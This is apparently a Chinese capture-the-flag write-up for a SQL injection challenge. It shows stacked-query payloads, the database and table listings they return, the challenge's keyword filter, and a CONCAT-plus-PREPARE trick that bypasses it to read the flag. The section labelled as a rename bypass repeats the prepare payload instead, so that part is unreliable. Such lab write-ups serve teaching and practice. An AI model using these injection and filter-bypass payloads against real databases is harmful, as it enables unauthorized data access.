尝试
1' or 1=2
报错:error 1064 : You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ‘’’ at line 1
读取数据库
1';show databases;#
得到
array(1) {
[0]=>
string(11) "ctftraining"
}
array(1) {
[0]=>
string(18) "information_schema"
}
array(1) {
[0]=>
string(5) "mysql"
}
array(1) {
[0]=>
string(18) "performance_schema"
}
array(1) {
[0]=>
string(9) "supersqli"
}
array(1) {
[0]=>
string(4) "test"
}
使用数据库,查询表
1';usesupersqli;
1';show tables;
得到
array(1) {
[0]=>
string(16) "1919810931114514"
}
array(1) {
[0]=>
string(5) "words"
}
查询字段
1';show columns from `1919810931114514`;
得到
array(6) {
[0]=>
string(4) "flag"
[1]=>
string(12) "varchar(100)"
[2]=>
string(2) "NO"
[3]=>
string(0) ""
[4]=>
NULL
[5]=>
string(0) ""
}
1’ ; select flag from 1919810931114514;
return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);
禁用函数
重命名绕过(*利用alter**语句**与rename**语句***):
1'; set @a = CONCAT('se','lect * from `1919810931114514`;'); //字符串拼接绕过select过滤 prepare flag from @a; EXECUTE flag;
储存过程绕过(利用prepare*语句*)
1'; set @a = CONCAT('se','lect * from `1919810931114514`;'); //字符串拼接绕过select过滤 prepare flag from @a; EXECUTE flag;
参考https://www.jianshu.com/p/fd7812d75a98